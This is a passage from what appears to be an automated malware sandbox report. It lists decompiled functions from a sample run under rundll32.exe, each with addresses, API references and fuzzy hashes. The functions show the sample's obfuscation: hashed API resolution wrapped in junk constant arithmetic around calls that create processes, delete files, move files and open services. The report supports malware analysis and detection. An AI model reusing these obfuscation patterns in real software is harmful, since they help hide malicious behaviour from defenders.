				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E001E07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}






                                          0x001d485e
                                          0x001d487a
                                          0x001d487d
                                          0x001d4884
                                          0x001d488b
                                          0x001d4892
                                          0x001d489d
                                          0x001d48a0
                                          0x001d48ad
                                          0x001d48b7

                                          APIs
                                          • ExitProcess.KERNELBASE(00000000), ref: 001D48B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                          • Associated: 00000010.00000002.2106647421.00000000001D0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000010.00000002.2106669829.00000000001EC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: [
                                          • API String ID: 621844428-1822564810
                                          • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction ID: 4d233150a7b1b8d0ca9ed02e51ebcc8e11366db29454cee23ee02343d5930ca8
                                          • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction Fuzzy Hash: A0F017B0E05209FBDB04CFE8CA5699EBFB9EB40301F20818CE444B7290E3B15F509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001E4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 66%
                                          			E001E4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001D602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E001E07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                          0x001e4f80
                                          0x001e4f81
                                          0x001e4f82
                                          0x001e4f86
                                          0x001e4f87
                                          0x001e4f8c
                                          0x001e4fa5
                                          0x001e4fa8
                                          0x001e4faf
                                          0x001e4fb6
                                          0x001e4fc7
                                          0x001e4fca
                                          0x001e4fd7
                                          0x001e4fe2
                                          0x001e4fe7

                                          APIs
                                          • CloseHandle.KERNELBASE(003E66D8), ref: 001E4FE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                          • Associated: 00000010.00000002.2106647421.00000000001D0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000010.00000002.2106669829.00000000001EC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: {#lm
                                          • API String ID: 2962429428-1564096886
                                          • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction ID: 6704b2815e5b6340f86946b0b895de4bfb083cb0925a4a1645cfd3f49927c494
                                          • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction Fuzzy Hash: 50F037B0C1120CFFDB04DFA4D98289EBFBAEB44300F208199E804AB250D3715B509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001E976F, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 21%
                                          			E001E976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001D602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E001E07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}








                                          0x001e9772
                                          0x001e9773
                                          0x001e9778
                                          0x001e977a
                                          0x001e977b
                                          0x001e977e
                                          0x001e977f
                                          0x001e9782
                                          0x001e9785
                                          0x001e9788
                                          0x001e9789
                                          0x001e978c
                                          0x001e978f
                                          0x001e9790
                                          0x001e9791
                                          0x001e9794
                                          0x001e9797
                                          0x001e979a
                                          0x001e979d
                                          0x001e97a0
                                          0x001e97a3
                                          0x001e97a6
                                          0x001e97a7
                                          0x001e97a8
                                          0x001e97ad
                                          0x001e97b7
                                          0x001e97c3
                                          0x001e97ca
                                          0x001e97d1
                                          0x001e97d8
                                          0x001e97df
                                          0x001e97e3
                                          0x001e97fc
                                          0x001e9816
                                          0x001e981d

                                          APIs
                                          • CreateProcessW.KERNEL32(001D591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,001D591A), ref: 001E9816
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                          • Associated: 00000010.00000002.2106647421.00000000001D0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000010.00000002.2106669829.00000000001EC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction ID: c55db46f124b2cc675f9668ff90ed3c07b71415c0d78f6d611415f865274e5c6
                                          • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction Fuzzy Hash: 0C11B372901188BFDF1A9FD6DC0ACDF7F7AEF89750F104148FA1556120D2728AA0EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001DB566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 31%
                                          			E001DB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E001D602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E001E07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                          0x001db569
                                          0x001db56a
                                          0x001db56d
                                          0x001db572
                                          0x001db574
                                          0x001db577
                                          0x001db57a
                                          0x001db57d
                                          0x001db580
                                          0x001db583
                                          0x001db586
                                          0x001db587
                                          0x001db58a
                                          0x001db58d
                                          0x001db590
                                          0x001db593
                                          0x001db594
                                          0x001db595
                                          0x001db59a
                                          0x001db5a4
                                          0x001db5b8
                                          0x001db5c0
                                          0x001db5c4
                                          0x001db5cb
                                          0x001db5d2
                                          0x001db5d9
                                          0x001db5e6
                                          0x001db5fd
                                          0x001db604

                                          APIs
                                          • CreateFileW.KERNELBASE(001E0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,001E0668,?,?,?,?), ref: 001DB5FD
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                          • Associated: 00000010.00000002.2106647421.00000000001D0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000010.00000002.2106669829.00000000001EC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction ID: 37c1b1c4d25d484248efe105347f02daa2207a1a560edb8fe11a26f7b2631849
                                          • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction Fuzzy Hash: 0611C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A60EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001E981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E001E981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001D602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E001E07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                          0x001e9821
                                          0x001e9822
                                          0x001e9825
                                          0x001e9828
                                          0x001e982a
                                          0x001e982c
                                          0x001e982f
                                          0x001e9832
                                          0x001e9835
                                          0x001e9836
                                          0x001e9837
                                          0x001e983c
                                          0x001e9855
                                          0x001e9858
                                          0x001e985f
                                          0x001e9866
                                          0x001e986d
                                          0x001e9874
                                          0x001e987b
                                          0x001e988e
                                          0x001e989b
                                          0x001e98a2

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,001D87F2,0000CAAE,0000510C,AD82F196), ref: 001E989B
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                          • Associated: 00000010.00000002.2106647421.00000000001D0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000010.00000002.2106669829.00000000001EC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction ID: b7709b50ae51164d8aeb1307988349b9148569f66681926d56ec9366ccc2218f
                                          • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction Fuzzy Hash: BA019A72801208FBDB04EFD5D846CDFBF79EF85310F108189F908A6220E6715B619BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001E7BF4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E001E7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001D602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E001E07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}









                                          0x001e7bf7
                                          0x001e7bf8
                                          0x001e7bfa
                                          0x001e7bfd
                                          0x001e7bff
                                          0x001e7c02
                                          0x001e7c06
                                          0x001e7c07
                                          0x001e7c0f
                                          0x001e7c1d
                                          0x001e7c25
                                          0x001e7c2d
                                          0x001e7c31
                                          0x001e7c38
                                          0x001e7c3f
                                          0x001e7c46
                                          0x001e7c4a
                                          0x001e7c5e
                                          0x001e7c67
                                          0x001e7c6d

                                          APIs
                                          • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 001E7C67
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                          • Associated: 00000010.00000002.2106647421.00000000001D0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000010.00000002.2106669829.00000000001EC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileOperation
                                          • String ID:
                                          • API String ID: 3080627654-0
                                          • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction ID: e7037390f7e7bacdf7c2bd971d6ce7ccbf9953c3af2e8e0c38516eaa01a5caa6
                                          • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction Fuzzy Hash: 28014BB190120CFFEB09DFA4C84A8DEBBB9EF54314F208199F405A7240EBB15F509B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001DF65F, Relevance: 1.5, APIs: 1, Instructions: 40serviceCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 52%
                                          			E001DF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001D602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E001E07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}








                                          0x001df662
                                          0x001df663
                                          0x001df665
                                          0x001df668
                                          0x001df66a
                                          0x001df66d
                                          0x001df670
                                          0x001df673
                                          0x001df677
                                          0x001df678
                                          0x001df67d
                                          0x001df687
                                          0x001df693
                                          0x001df69a
                                          0x001df6a1
                                          0x001df6a5
                                          0x001df6a9
                                          0x001df6b0
                                          0x001df6c9
                                          0x001df6d8
                                          0x001df6de

                                          APIs
                                          • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 001DF6D8
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                          • Associated: 00000010.00000002.2106647421.00000000001D0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000010.00000002.2106669829.00000000001EC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: OpenService
                                          • String ID:
                                          • API String ID: 3098006287-0
                                          • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction ID: 25db9c83cd685e5ff74837f7b26bcfb941d860824d8c17e223a5a90ae44bee76
                                          • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction Fuzzy Hash: 7F01E5B6901208BFEF059F94DC468DF7F75EB19324F148188F90462250D7B25E61DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001DB6DD, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E001DB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E001D602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E001E07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}








                                          0x001db6f3
                                          0x001db6f8
                                          0x001db702
                                          0x001db70b
                                          0x001db712
                                          0x001db719
                                          0x001db720
                                          0x001db727
                                          0x001db72e
                                          0x001db747
                                          0x001db759
                                          0x001db75e

                                          APIs
                                          • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 001DB759
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                          • Associated: 00000010.00000002.2106647421.00000000001D0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000010.00000002.2106669829.00000000001EC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileHandleInformation
                                          • String ID:
                                          • API String ID: 3935143524-0
                                          • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction ID: 4e94c54c4c2e972598a0f63784df660732168030f90fb273d613f908c69640ee
                                          • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction Fuzzy Hash: DF0128B6941308FBEB45DF94DD06A9E7BB5EB18704F108188FA09661A0D3B25E20AB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001EAA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E001EAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001D602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E001E07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                          0x001eaa3f
                                          0x001eaa40
                                          0x001eaa41
                                          0x001eaa44
                                          0x001eaa47
                                          0x001eaa4b
                                          0x001eaa4c
                                          0x001eaa51
                                          0x001eaa5b
                                          0x001eaa64
                                          0x001eaa68
                                          0x001eaa6f
                                          0x001eaa76
                                          0x001eaa8d
                                          0x001eaa90
                                          0x001eaa9d
                                          0x001eaaa8
                                          0x001eaaad

                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 001EAAA8
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                          • Associated: 00000010.00000002.2106647421.00000000001D0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000010.00000002.2106669829.00000000001EC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction ID: 6cc9e9da56f875ccb929634986dd8fabee2daaccf13b632fb616f58897090f90
                                          • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction Fuzzy Hash: 20F019B590020CFFDF08DF94DD4A99EBFB5EB45304F108198F915A6250D3B69F549B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001D5FB2, Relevance: 1.5, APIs: 1, Instructions: 33serviceCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E001D5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001D602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E001E07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}







                                          0x001d5fb5
                                          0x001d5fb6
                                          0x001d5fb7
                                          0x001d5fbb
                                          0x001d5fbc
                                          0x001d5fc1
                                          0x001d5fcb
                                          0x001d5fd7
                                          0x001d5fde
                                          0x001d5fe5
                                          0x001d5ffc
                                          0x001d5fff
                                          0x001d6006
                                          0x001d600d
                                          0x001d601a
                                          0x001d6025
                                          0x001d602a

                                          APIs
                                          • CloseServiceHandle.ADVAPI32(39CCF342), ref: 001D6025
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                          • Associated: 00000010.00000002.2106647421.00000000001D0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000010.00000002.2106669829.00000000001EC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleService
                                          • String ID:
                                          • API String ID: 1725840886-0
                                          • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction ID: 21e3675d678c7d47ccde82411a3224adeb747ad6c423f1aa475c33c6d4e2ced6
                                          • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction Fuzzy Hash: 7DF04FB0C11208FFDB08DFA0E94689EBFB8EB54300F208198E409A7260E7B15F559F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Analysis Process: rundll32.exe PID: 1604 Parent PID: 2252 rundll32.exeCOMMON

                                          Executed Functions

                                          Function 00212959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E00212959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0021602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002207A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                          0x0021295f
                                          0x00212964
                                          0x00212967
                                          0x0021296a
                                          0x0021296d
                                          0x0021296e
                                          0x0021296f
                                          0x00212977
                                          0x00212985
                                          0x0021298a
                                          0x00212992
                                          0x0021299a
                                          0x002129a2
                                          0x002129a9
                                          0x002129b0
                                          0x002129b7
                                          0x002129bb
                                          0x002129cf
                                          0x002129dc
                                          0x002129e2

                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002129DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000011.00000002.2110585240.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 00000011.00000002.2110685458.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID: <^
                                          • API String ID: 1889721586-3203995635
                                          • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction ID: d406d96ca1e4ca2a5ce053f8c48229baa50acf6c46116ac46087fabbe791cae1
                                          • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction Fuzzy Hash: E3016D72A00108BFEB14DF95DC4A8DFBFB6EF48310F108088F508A6250D7B65F619B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0021C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E0021C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0021602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002207A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                          0x0021c6e1
                                          0x0021c6e6
                                          0x0021c6f0
                                          0x0021c6fc
                                          0x0021c703
                                          0x0021c706
                                          0x0021c70d
                                          0x0021c711
                                          0x0021c715
                                          0x0021c71c
                                          0x0021c723
                                          0x0021c72a
                                          0x0021c731
                                          0x0021c738
                                          0x0021c751
                                          0x0021c762
                                          0x0021c768

                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0021C762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000011.00000002.2110585240.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 00000011.00000002.2110685458.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FolderPath
                                          • String ID: /O
                                          • API String ID: 1514166925-1923427199
                                          • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
